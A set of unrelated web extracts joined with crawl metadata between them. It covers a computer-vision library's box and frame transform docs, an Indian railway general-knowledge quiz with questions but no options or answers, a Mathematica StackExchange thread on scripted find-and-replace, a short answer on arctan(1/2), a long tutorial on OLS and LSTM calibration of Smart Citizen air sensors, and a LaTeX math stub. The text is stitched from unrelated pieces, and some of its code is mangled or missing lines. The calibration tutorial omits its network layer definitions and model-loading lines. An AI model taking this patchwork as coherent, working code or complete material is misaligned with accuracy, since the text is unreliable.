Function that applies a transformation matrix to a box or batch of boxes. Boxes must be a tensor of the shape (N, 4) or a batch of boxes (B, N, 4) and trans_mat must be a (3, 3) transformation matrix or a batch of transformation matrices (B, 3, 3)
Parameters
• trans_mat (Tensor) – The transformation matrix to be applied.
• boxes (Tensor) – The boxes to be transformed.
• mode (str, optional) – The format in which the boxes are provided. If set to ‘xyxy’ the boxes are assumed to be in the format (xmin, ymin, xmax, ymax). If set to ‘xywh’ the boxes are assumed to be in the format (xmin, ymin, width, height). Default: 'xyxy'
Return type
Tensor
Returns
The set of transformed points in the specified mode.
perspective_transform_lafs(trans_01, lafs_1)[source]
Function that applies perspective transformations to a set of local affine frames (LAFs).
Parameters
Return type
Tensor
Returns
tensor of N-dimensional points of shape $$(B, N, 2, 3)$$.
Examples
>>> rng = torch.manual_seed(0)
>>> lafs_1 = torch.rand(2, 4, 2, 3) # BxNx2x3
>>> lafs_1
tensor([[[[0.4963, 0.7682, 0.0885],
[0.1320, 0.3074, 0.6341]],
[[0.4901, 0.8964, 0.4556],
[0.6323, 0.3489, 0.4017]],
[[0.0223, 0.1689, 0.2939],
[0.5185, 0.6977, 0.8000]],
[[0.1610, 0.2823, 0.6816],
[0.9152, 0.3971, 0.8742]]],
[[[0.4194, 0.5529, 0.9527],
[0.0362, 0.1852, 0.3734]],
[[0.3051, 0.9320, 0.1759],
[0.2698, 0.1507, 0.0317]],
[[0.2081, 0.9298, 0.7231],
[0.7423, 0.5263, 0.2437]],
[[0.5846, 0.0332, 0.1387],
[0.2422, 0.8155, 0.7932]]]])
>>> trans_01 = torch.eye(3).repeat(2, 1, 1) # Bx3x3
>>> trans_01.shape
torch.Size([2, 3, 3])
>>> lafs_0 = perspective_transform_lafs(trans_01, lafs_1) # BxNx2x3 | 2022-08-13 06:24:38 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8488030433654785, "perplexity": 13015.665941193392}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571909.51/warc/CC-MAIN-20220813051311-20220813081311-00410.warc.gz"} |
https://cracku.in/rq-railways-general-knowledge-test-137 | ## Railways General Knowledge Test 137
Instructions
For the following questions answer them individually
Q 1
Which temperature in celsius scale is equal to 300 k?
Q 2
Non-metals generally contain .......... electrons in their outermost shell.
Q 3
Who was appointed as the Defense Minister when the $$16^{th}$$ Lok Sabha was formed in 2014?
Q 4
Which of the following is taken as crop ?
Q 5
What happens as we go down the group in the periodic table? | 2021-11-28 14:04:42 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.42010366916656494, "perplexity": 6840.925671983627}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-49/segments/1637964358560.75/warc/CC-MAIN-20211128134516-20211128164516-00382.warc.gz"} |
https://mathematica.stackexchange.com/questions/83492/is-there-a-programmatic-equivalent-of-edit-find | # Is there a programmatic equivalent of Edit > Find…?
Most things that can be done via the front-end interface in Mathematica can also be accomplished by some function. Is that the case for find-and-replacing? That is, is there some code I could execute in a Mathematica notebook that would have the same effect as me using the Edit > Find… window to replace all occurrences of "find this text" with "replace with this text" through the whole notebook?
Update: I think I've got it.
I found a token that does the replacement without bringing up a dialog. The values from the last use of the Find and Replace dialog will be used. The command is:
FrontEndExecute @ FrontEndToken[nb, "ReplaceAll"]
where nb is the target Notebook object.
To preset the Find and Replace fields one can modify the FindSettings option of the Front End like so:
CurrentValue[$FrontEnd, {FindSettings, "FindString"}] = "This"; CurrentValue[$FrontEnd, {FindSettings, "ReplaceBoxes"}] = "That";
Now:
FrontEndExecute @ FrontEndToken[nb, "ReplaceAll"]
After:
## Version 7
In version 7 under Windows I need this variation for the method to work:
CurrentValue[$FrontEnd, {FindSettings, "ReplaceString"}] = "That"; • I can't make functions from SystemResources/Find.nb working, any idea? FEEvaluate[ FEPrivateFindExpression[ FrontEndCurrentValue[ FrontEnd$FrontEnd, {FindSettings, "FindBoxes"}], "Previous", False, False, False]] – Kuba May 15 '15 at 7:32
• @Mr.Wizard The "FindString" option seems to work as expected for me, but the "ReplaceBoxes" (or "ReplaceString", which I also tried) option has no effect. (Mma 9.0.1.0) – thecommexokid May 15 '15 at 16:46
• @thecommexokid Possibly just the CurrentValue method is failing. Please use the Find and Replace dialog with unique values for the find and replace fields, then evaluate Options[$FrontEnd, FindSettings] and tell me if the suboptions "FindString" and "ReplaceBoxes" exist, and have been set to the values you entered. If so it should be possible to get this working. – Mr.Wizard May 16 '15 at 3:20 • Yes, Options[$FrontEnd, FindSettings] gives the values I entered. – thecommexokid May 18 '15 at 1:20
• And CurrentValue[$FrontEnd, {FindSettings, "ReplaceBoxes"}] = "differentString" returns Null, but if I execute Options[$FrontEnd, FindSettings] again afterward, the ReplaceBoxes setting shows the new value. – thecommexokid May 18 '15 at 1:21 | 2021-03-07 23:41:43 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.26408690214157104, "perplexity": 3414.1362413037737}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-10/segments/1614178381230.99/warc/CC-MAIN-20210307231028-20210308021028-00608.warc.gz"} |
https://socratic.org/questions/can-anyone-tell-me-what-arctan-1-2-in-radians-or-degrees-with-no-approximations | ×
# Can anyone tell me what arctan(1/2) (in radians or degrees), with no approximations?
Sep 26, 2015
$\arctan \left(0.5\right)$ is not a rational multiple of $\pi$. (See the discussion here: http://math.stackexchange.com/questions/79861/arctan2-a-rational-multiple-of-pi )
Furthermore, I do not believe that $\arctan \left(0.5\right)$ is rational in radians or degrees. | 2018-09-25 05:17:41 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 3, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6027123332023621, "perplexity": 707.1408284154371}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-39/segments/1537267161098.75/warc/CC-MAIN-20180925044032-20180925064432-00310.warc.gz"} |
https://docs.iscape.smartcitizen.me/Sensor%20Analysis%20Framework/guides/Creating%20Models%20for%20Sensors%20Calibration/ | # Creating models for the low cost sensors calibrationLink
In this section, we will work on the development of two models for the MOS sensors in the Smart Citizen Kit. In the Sensor Analysis Framework, we have implemented two different approaches for model calibration:
• Ordinary Least Squares (OLS): based on the statsmodels package, the model is able to input whichever expression referring to the kit's available data and perform OLS regression over the defined training and test data
• Machine Learning (MLP or LSTM): based on the keras package using tensorflow in the backend. This framework can be used to train larger collections of data, where we want to be, among others:
• Robust to noise
• Learn non-linear relationships
• Aware of temporal dependence
Let's delve first into an OLS example. The framework comes with a very simple interface to develop and interact with the models. By running these two cells we will generate the preliminary tweaks for the dataframes:
from test_utils import combine_data
name_combined_data = 'COMBINED_DEVICES'
## Since we don't know if there are more or less channels than last time
## (and tbh, I don't feel like checking), remove the key
## And then add it again
Output:
Dataframe has been combined for model preparation
Here we can list all the available channels for our test:
test_linear_regression = '2018-08_INT_STATION_TEST_SUMMER_HOLIDAYS'
print channel
Output:
BATT_4748
CO_MICS_RAW_4748
EXT_HUM_4748
EXT_TEMP_4748
GB_1A_4748
GB_1W_4748
(...)
PM_1_4748
PM_10_4748
PM_25_4748
PM_DALLAS_TEMP_4748
PRESS_4748
TEMP_4748
And now, it's time to set up our model. In the cell below we can define the channel and features for the regression.
from linear_regression_utils import prepData, fit_model
## Select data
# Always have an item called 'REF', the rest can be anything
['A', 'CO_MICS_RAW_4748'],
['B', 'TEMP_4748'],
['C', 'HUM_4748'],
['D', 'PM_25_4748'])
formula_expression = 'REF ~ A + np.power(A,2) + B + np.power(B,2) + C + D'
min_date = '2018-08-31 00:00:00'
max_date = '2018-09-06 00:00:00'
ratio_train = 2./3 # Important that this is a float, don't forget the .
filter_data = True
alpha_filter = 0.1
dataTrain, dataTest = prepData(dataframeModel, tuple_features, min_date, max_date, ratio_train, filter_data, alpha_filter)
model, train_rmse, test_rmse = fit_model(formula_expression, dataTrain, dataTest
We have to keep at least the key 'REF ' within the tuple_features, but the rest can be renamed at will. We can also input whichever formula_expression for the model regression in the following format:
formula_expression = 'REF ~ A + np.power(A,2) + B + np.power(B,2) + C + D'
Which converts to:
REF = A + A^2 + B + B^2 + C + D + Intercept
We can also define the ratio between the train and test dataset and the minimum dates to use within the datasets (globally):
min_date = '2018-08-31 00:00:00'
max_date = '2018-09-06 00:00:00'
ratio_train = 2./3 # Important that this is a float, don't forget the .
Finally, if our data is too noisy, we can apply an exponential smoothing function, by setting filter_data = True and the alpha coefficient (0.1, 0.2 is already very filtered:
filter_data = True
alpha_filter = 0.1
If we run this cell, we will perform model calibration, with the following output:
OLS Regression Results
==============================================================================
Dep. Variable: REF R-squared: 0.676
Method: Least Squares F-statistic: 197.5
Date: Thu, 06 Sep 2018 Prob (F-statistic): 1.87e-135
Time: 12:25:17 Log-Likelihood: 1142.9
No. Observations: 575 AIC: -2272.
Df Residuals: 568 BIC: -2241.
Df Model: 6
Covariance Type: nonrobust
==================================================================================
coef std err t P>|t| [0.025 0.975]
----------------------------------------------------------------------------------
Intercept -3.7042 0.406 -9.133 0.000 -4.501 -2.908
A 0.0011 0.000 2.953 0.003 0.000 0.002
np.power(A, 2) -3.863e-05 7.03e-06 -5.496 0.000 -5.24e-05 -2.48e-05
B 0.2336 0.024 9.863 0.000 0.187 0.280
np.power(B, 2) -0.0032 0.000 -9.267 0.000 -0.004 -0.003
C -0.0014 0.001 -2.755 0.006 -0.002 -0.000
D 0.0127 0.001 24.378 0.000 0.012 0.014
==============================================================================
Omnibus: 7.316 Durbin-Watson: 0.026
Prob(Omnibus): 0.026 Jarque-Bera (JB): 10.245
Skew: -0.076 Prob(JB): 0.00596
Kurtosis: 3.636 Cond. No. 4.29e+05
==============================================================================
Warnings:
[1] Standard Errors assume that the covariance matrix of the errors is correctly specified.
[2] The condition number is large, 4.29e+05. This might indicate that there are
strong multicollinearity or other numerical problems.
This output brings a lot of information. First, we find what the dependent variable is, in our case always 'REF'. The type of model used and some general information is shown below that.
More statistically important information is found in the rest of the output. Some key data:
• R-squared and adjusted R-squared: this is our classic correlation coefficient or R2. The adjusted one aims to correct the model overfitting by the inclusion of too many variables, and for that introduces a penalty on the number of variables included
• Below, we can find a summary of the model coefficients applied to all the variables and the P>|t| term, which indicates the significance of the term introduced in the model
• Model quality diagnostics are also indicated. Kurtosis and skewness are metrics for determining the distribution of the residuals. They indicate how the residuals of the model resemble a normal distribution. Below, we will review more on diagnosis plots. The Jarque Bera test indicates if the residuals are normally distributed (the null hypothesis is a joint hypothesis of the skewness being zero and the excess kurtosis being zero), and a value of zero indicates that the data is normally distributed. If the Jarque Bera test is valid (in the case above it isn't), the Durbin Watson is applicable in order to check for autocorrelation of the residuals (meaning that the residuals of our model are related among themselves and that we haven't captured some characteristics of our data with the tested model).
Finally, there is a warning at the bottom indicating that the condition number is large. It suggests we might have multicollinearity problems in our model, which means that some of the independent variables might be correlated among themselves and that they are probably not necessary.
Our function also depicts the results in a graphical way for us to see the model itself. It will show the training and test datasets (as Reference Train and Reference Test respectively), and the prediction results. The mean and absolute confidence intervals for 95% confidence are also shown:
Now we can look at some other model quality plots. If we run the cell below, we will obtain an adaptation of the summary plots from R:
from linear_regression_utils import modelRplots
%matplotlib inline
modelRplots(model, dataTrain, dataTest)
Let's review the output step by step:
• Residual vs Fitted and Scale Location plot: these plots represents the model heteroscedasticity , which is a representation of the residuals versus the fitted values. This polot is helpful to check if the errors are distributed homogeneously and that we are not penalising high, low, or other values. There is also a red line which represents the average trend of this distribution which, we want it to be horizontal. For more information visit here and here. Clearly, in this model we are missing something:
• Normal QQ: the qq-plot is a representation of the kurtosis and skewness of the residuals distribution. If the data were well described by a normal distribution, the values should be about the same, i.e.: on the diagonal (red line). For example, in our case the model presents a deviation on both tails, indicating skewness. In general, a simple rubric to interpret a qq-plot is that if a given tail twists off counterclockwise from the reference line, there is more data in that tail of your distribution than in a theoretical normal, and if a tail twists off clockwise there is less data in that tail of your distribution than in a theoretical normal. In other words:
• if both tails twist counterclockwise we have heavy tails (leptokurtosis),
• if both tails twist clockwise, we have light tails (platykurtosis),
• if the right tail twists counterclockwise and the left tail twists clockwise, we have right skew
• if the left tail twists counterclockwise and the right tail twists clockwise, we have left skew
• Residuals vs Leverage: this plot is probably the most complex of them all. It shows how much leverage one single point has on the whole regression. It can be interpreted as how the average line that passes through all the data (that we are calculating with the OLS) can be modified by 'far' points in the distribution, for example, outliers. This leverage can be seen as how much a single point is able to pull down or up the average line. One way to think about whether or not the results are driven by a given data point is to calculate how far the predicted values for your data would move if your model were fit without the data point in question. This calculated total distance is called Cook's distance. We can have four cases (more information from source, here)
• everything is fine (the best)
• high-leverage, but low-standardized residual point
• low-leverage, but high-standardized residual point
• high-leverage, high-standardized residual point (the worst)
In this case, we see that our model has some points with higher leverage but low residuals (probably not too bad) and that the higher residuals are found with low leverage, which means that our model is safe to outliers. If we run this function without the filtering, some outliers will be present and the plot turns into:
As we have seen in the the calibration section, machine learning algorithms promise a better representation of the sensor's data, being able to learn robust non-linear models and sequential dependencies. For that reason, we have implemented an easy to use interface based on keras with Tensorflow backend, in order to train sequential models 3.
The workflow for a supervised learning algorithm reads as follows:
• Reframe the data as a supervised learning algorithm and split into training and test dataframe. More information can be found here
• Define Model and fit for training dataset
• Evaluate test dataframe and extract metrics
Let's go step by step. In order to reframe the data as a supervised learning algorithm, we have created a function called prep_dataframe_ML which is the only one function we'll have to interact with:
# Combine all data in one dataframe
from ml_utils import prep_dataframe_ML
# Always have an item called 'REF', the rest can be anything
['A', 'CO_MICS_RAW_STATION_CASE'],
['B', 'TEMP_STATION_CASE'],
['C', 'HUM_STATION_CASE'],
['D', 'PM_25_STATION_CASE'])
model_name = 'LSTM NO2'
ratio_train = 3./4 # Important that this is a float, don't forget the .
alpha_filter = 0.9 # 1 means no filtering
# Number of lags for the model
n_lags = 1
index, train_X, train_y, test_X, test_y, scaler, n_train_periods = prep_dataframe_ML(dataframeModel, min_date, max_date, tuple_features, n_lags, ratio_train, alpha_filter)
Output:
DataFrame has been reframed and prepared for supervised learning
Features are: ['CO_MICS_RAW_STATION_CASE', 'TEMP_STATION_CASE', 'HUM_STATION_CASE', 'PM_25_STATION_CASE']
Traning X Shape (1508, 1, 4), Training Y Shape (1508,), Test X Shape (501, 1, 4), Test Y Shape (501,)
Now, we can fit our model. The main function is fit_model_ML and currently implements a simple LSTM network. This network can be redefined easily by modifying the underlying function.
model = fit_model_ML(train_X, train_y, test_X, test_y, epochs = 50, batch_size = 72, verbose = 2)
def fit_model_ML(train_X, train_y, test_X, test_y, epochs = 50, batch_size = 72, verbose = 2):
model = Sequential()
layers = [50, 100, 1]
model.compile(loss='mse', optimizer='rmsprop')
# fit network
history = model.fit(train_X, train_y, epochs=epochs, batch_size=batch_size, validation_data=(test_X, test_y), verbose=verbose, shuffle=False)
# plot history
fig = plot.figure(figsize=(10,8))
plot.plot(history.history['loss'], label='train')
plot.plot(history.history['val_loss'], label='test')
plot.xlabel('Epochs (-)')
plot.ylabel('Loss (-)')
plot.title('Model Convergence')
plot.legend(loc='best')
plot.show()
return model
This function will return the model and it's learning outcomes:
Train on 1508 samples, validate on 501 samples
Epoch 1/50
- 1s - loss: 0.0500 - val_loss: 0.0051
Epoch 2/50
- 0s - loss: 0.0200 - val_loss: 0.0058
Epoch 3/50
- 0s - loss: 0.0158 - val_loss: 0.0052
...
Then, we can evaluate the model and plot it's results:
from ml_utils import predict_ML
from signal_utils import metrics
import matplotlib.pyplot as plot
%matplotlib inline
inv_y_train, inv_yhat_train = predict_ML(model, train_X, train_y, n_lags, scaler)
inv_y_test, inv_yhat_test = predict_ML(model, test_X, test_y, n_lags, scaler)
Here is a visual comparison of both models:
fig = plot.figure(figsize=(15,10))
# Actual data
plot.plot(index[:n_train_periods], inv_y_train,'r', label = 'Reference Train', alpha = 0.3)
plot.plot(index[n_train_periods+n_lags:], inv_y_test, 'b', label = 'Reference Test', alpha = 0.3)
# Fitted Values for Training
plot.plot(index[:n_train_periods], inv_yhat_train, 'r', label = 'ML Prediction Train')
plot.plot(index[n_train_periods+n_lags:], inv_yhat_test, 'b', label = 'ML Prediction Test')
# OLS
plot.plot(dataTrain['index'], predictionTrain, 'g', label = 'OLS Prediction Train')
plot.plot(dataTest['index'], predictionTest, 'k', label = 'OLS Prediction Test')
plot.legend(loc = 'best')
plot.ylabel('CO (ppm)')
plot.xlabel('Date (-)')
Output:
It is very difficult though, to know which one is performing better. Let's then evaluate and compare our models. In order to evaluate it's metrics, we will be using the following principles12:
Info
In all of the expressions below, the letter m indicates the model field, r indicates the reference field. Overbar is average and $\sigma$ is the standard deviation.
Linear correlation Coefficient A measure of the agreement between two signals:
R = {{1 \over N} \sum_{i=0}^n (m_n-\overline m)( r_n-\overline r ) \over \sigma_m\sigma_r}
The correlation coefficient is bounded by the range $-1 \le R \le 1$. However, it is difficult to discern information about the differences in amplitude between two signals from R alone.
Normalized standard deviation A measure of the differences in amplitude between two signals: $$\sigma * = {\sigma_m \over \sigma_r}$$
unbiased Root-Mean-Square Difference A measure of how close the modelled points fall to teach other:
RMSD' = \Bigl( {1 \over N} \sum_{n=1}^N [(m_n - \overline m)-(r_n - \overline r)]^2 \Bigr)^{0.5}
Potential Bias Difference between the means of two fields: $$B = \overline m - \overline r$$ Total RMSD A measure of the average magnitude of difference: $$RMSD = \Bigl( {1 \over N} \sum_{n=1}^N (m_n - r_n)^2 \Bigr)^{0.5}$$
In other words, the unbiased RMSD (RMSD') is equal to the total RMSD if there is no bias between the model and the reference fields (i.e. B = 0). The relationship between both reads:
RMSD^2 = B^2 + RMSD'^2
In contrast, the unbiased RMSD may be conceptualized as an overall measure of the agreement between the aplitude ($\sigma$) and phase ($\phi$) of two temporal patterns. For this reason, the correlation coefficient ($R$), normalised standard deviation ($\sigma*$), and unbiased RMSD are all referred to as patern statistics, related to one another by:
RMSD'^2 = \sigma_r^2 + \sigma_m^2 - 2\sigma_r\sigma_mR
Normalized and unbiased RMSD If we recast in standard deviation normalized units (indicated by the asterisk) it becomes:
RMSD'^* = \sqrt { 1 + \sigma*^2 - 2\sigma*R}
NB: the minimum of this function occurrs when $\sigma* = R$.
Normalized bias Gives information about the mean difference but normalized by the $\sigma*$ $$B* = {\overline m - \overline r \over \sigma_r}$$
Target diagrams The target diagram is a plot that provides summary information about the pattern statistics as well as the bias thus yielding an overview of their respective contributions to the total RMSD. In a simple Cartesian coordinate system, the unbiased RMSD may serve as the X-axis and the bias may serve as the Y-axis. The distance between the origin and the model versus observation statistics (any point, s, within the X,Y Cartesian space) is then equal to the total RMSD. If all is normalized by the $\sigma_r$, the distance from the origin is again the standard deviation normalized total RMSD:1
RMSD^{*2} = B^{*2}+RMSD^{*'2}
The resulting target diagram then provides information about:
• whether the $\sigma_m$ is larger or smaller thann the $\sigma_r$
• whether there is a positive or negative bias
Image Source: Jolliff et al. 1
Any point greater than RMSD*=1 is to be considered a poor performer since it doesn't offer improvement over the time series average.
Interestingly, the target diagram has no information about the correlation coefficient R, but some can be inferred, knowing that all the points within the RMSD* <1 are positively correlated (R>0), although, in 1 it is shown that a circle marker with radius $M_{R1}$, means that all the points between that marker and the origin have a R coefficient larger than R1, where:
M_{R1} = min(RMSD*') = \sqrt {1+R1^2-2R1^2}
Let's now compare both models. If we execute this line, we will retrieve all model metrics:
metrics_model_train = metrics(inv_y_train, inv_yhat_train)
metrics_model_test = metrics(inv_y_test, inv_yhat_test)
## Metrics Train
print('\t\t Train \t\t Test')
for item in metrics_model_train.keys():
print ('% s: \t %.5f \t %.5f ' % (item, metrics_model_train[item], metrics_model_test[item]))
Output:
Train Test
avg_ref: 0.65426 0.53583
sig_est: 0.08412 0.03160
RMSD: 0.08439 0.05511
avg_est: 0.61639 0.53135
sigma_norm: 0.67749 0.50032
sign_sigma: -1.00000 -1.00000
sig_ref: 0.12416 0.06317
bias: -0.03787 -0.00448
RMSD_norm_unb: 0.68200 0.87258
rsquared: 0.53801 0.23874
normalised_bias: -0.30502 -0.07093
And finally, we can compare both models, training and test dataframe with the function:
targetDiagram(_dataframe, _plot_train)
Output:
Here, every point that falls inside the yellow circle, will have an R2 over 0.7, and so will be the red and green for R2 over 0.5 and 0.9 respectively. We see that only one of our models performs well in that sense, which is the training dataset of the OLS. However, this dataset performs pretty badly in the test dataset, being the LSTM options much better. This target diagram offers information about how the hyperparameters affect our networks. For instance, increasing the training epochs from 100 to 200 does not affect greatly on model performance, but the effect of filtering the data beforehand to reduce the noise shows a much better model performance in both, training and test dataframe.
Let's now assume that we are happy with our models. Depending on the model we have developed (OLS or ML ), we follow different approaches for the export:
Machine Learning Model
We will use joblib to save the model metrics and parameters. The keras model will be saved with the to_json property of the model and the weights in an h5 format with the save_weightsght:
from os.path import join
from sklearn.externals import joblib
modelDirML = '/path/to/modelDir'
filenameML = join(modelDirML, model_name_ML)
# Save everything
joblib.dump(dictModel[model_name_ML]['metrics'], filenameML + '_metrics.sav')
joblib.dump(dictModel[model_name_ML]['parameters'], filenameML + '_parameters.sav')
model_json = model.to_json()
with open(filenameML + "_model.json", "w") as json_file:
json_file.write(model_json)
model.save_weights(filenameML + "_model.h5")
print("Model " + model_name_ML + " saved in: " + modelDir)
Output:
Model LSTM CO 200 epochs Filter 0.9 saved in: /path/to/modelDir
And in our directory:
➜ models ls -l
-rw-r--r-- Sep 11 12:54 LSTM CO 200 epochs Filter 0.9_metrics.sav
-rw-r--r-- Sep 11 12:54 LSTM CO 200 epochs Filter 0.9_model.h5
-rw-r--r-- Sep 11 12:54 LSTM CO 200 epochs Filter 0.9_model.json
-rw-r--r-- Sep 11 12:54 LSTM CO 200 epochs Filter 0.9_parameters.sav
OLS model
We will use joblib for all the objects serialisation in this case:
from os.path import join
from sklearn.externals import joblib
modelDir_OLS = '/path/to/model'
filename_OLS = join(modelDir_OLS, model_name_OLS)
# Save everything
joblib.dump(dictModel[model_name_OLS]['metrics'], filename_OLS + '_metrics.sav')
joblib.dump(dictModel[model_name_OLS]['parameters'], filename_OLS + '_parameters.sav')
joblib.dump(dictModel[model_name_OLS]['model'], filename_OLS + '_model.sav')
print("Model saved in: " + modelDir_OLS)
Output:
Model saved in: /path/to/model
And in the terminal:
➜ models ls -l
total 1928
-rw-r--r-- Sep 11 12:53 CO_MICS + Log(CO_MICS) + Poly(T) + PM25_metrics.sav
-rw-r--r-- Sep 11 12:53 CO_MICS + Log(CO_MICS) + Poly(T) + PM25_model.sav
-rw-r--r-- Sep 11 12:53 CO_MICS + Log(CO_MICS) + Poly(T) + PM25_parameters.sav
Now, sometime after having exported our model, let's assume we need to get it back:
Machine Learning Model
We will use the symmetric functions from joblib and keras:
from os.path import join
from sklearn.externals import joblib
from keras.models import model_from_json
modelDirML = '/path/to/model'
filenameML = join(modelDirML, model_name_ML)
json_file = open(filenameML + "_model.json", "r")
json_file.close()
print("Loaded " + model_name_ML + " from disk")
Output:
Loaded LSTM CO 200 epochs Filter 0.9 from disk
['A', 'CO_MICS_RAW_STATION_CASE'],
['B', 'TEMP_STATION_CASE'],
['C', 'HUM_STATION_CASE'],
['D', 'PM_25_STATION_CASE'])}
{'test': {'RMSD': 0.055340715974325445,
'RMSD_norm_unb': 0.8761932784857427,
'avg_est': 0.5344016428091338,
'avg_ref': 0.5358268506805136,
'bias': -0.0014252078713797856,
'normalised_bias': -0.022562028100955915,
'rsquared': 0.23248054249786632,
'sig_est': 0.03133999875370688,
'sig_ref': 0.06316842905267908,
'sigma_norm': 0.4961338951071746,
'sign_sigma': -1.0},
'train': {'RMSD': 0.08111001248781997,
'RMSD_norm_unb': 0.6549199203336652,
'avg_est': 0.6204429297293235,
'avg_ref': 0.6542569775479774,
'bias': -0.033814047818653936,
'normalised_bias': -0.27234526337748927,
'rsquared': 0.573229625070228,
'sig_est': 0.08824634698454116,
'sig_ref': 0.12415875128250474,
'sigma_norm': 0.7107541439729025,
'sign_sigma': -1.0}}
OLS Model
Similarly, we will use the joblib.load function:
from os.path import join
from sklearn.externals import joblib
modelDir_OLS = '/path/to/model'
filename_OLS = join(modelDir_OLS, model_name_OLS)
print("Loaded " + model_name_OLS + " from disk")
Output:
Loaded CO_MICS + Log(CO_MICS) + Poly(T) + PM25 from disk
['A', 'CO_MICS_RAW_STATION_CASE'],
['B', 'TEMP_STATION_CASE'],
['C', 'HUM_STATION_CASE'],
['D', 'PM_25_STATION_CASE']),
'formula': 'REF ~ np.log10(A) + A + B + np.power(B,2) + D'}
{'test': {'RMSD': 0.0440714230263565,
'RMSD_norm_unb': 0.8723428704290845,
'avg_est': 0.550690169722107,
'avg_ref': 0.5351888829750784,
'bias': 0.015501286747028664,
'normalised_bias': 0.30432821283315176,
'rsquared': 0.2513771504173782,
'sig_est': 0.031200761981503004,
'sig_ref': 0.05093608181350988,
'sigma_norm': 0.6125473509277183,
'sign_sigma': -1.0},
'train': {'RMSD': 0.062207196964372664,
'RMSD_norm_unb': 0.5279216759963998,
'avg_est': 0.6559505800446772,
'avg_ref': 0.6559505800448995,
'bias': -2.2226664952995634e-13,
'normalised_bias': -1.8862669894154184e-12,
'rsquared': 0.721298704013152,
'sig_est': 0.10007571794915669,
'sig_ref': 0.11783414054170561,
'sigma_norm': 0.849293061324077,
'sign_sigma': -1.0}}
And that's it! Now it is time to iterate and compare our models. | 2019-01-22 16:23:14 | {"extraction_info": {"found_math": true, "script_math_tex": 12, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6090917587280273, "perplexity": 4138.738100124433}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-04/segments/1547583857993.67/warc/CC-MAIN-20190122161345-20190122183345-00459.warc.gz"} |
https://docs.w3cub.com/latex/math | # W3cubDocs
/LaTeX
### math
Synopsis:
\begin{math}
math
\end{math}
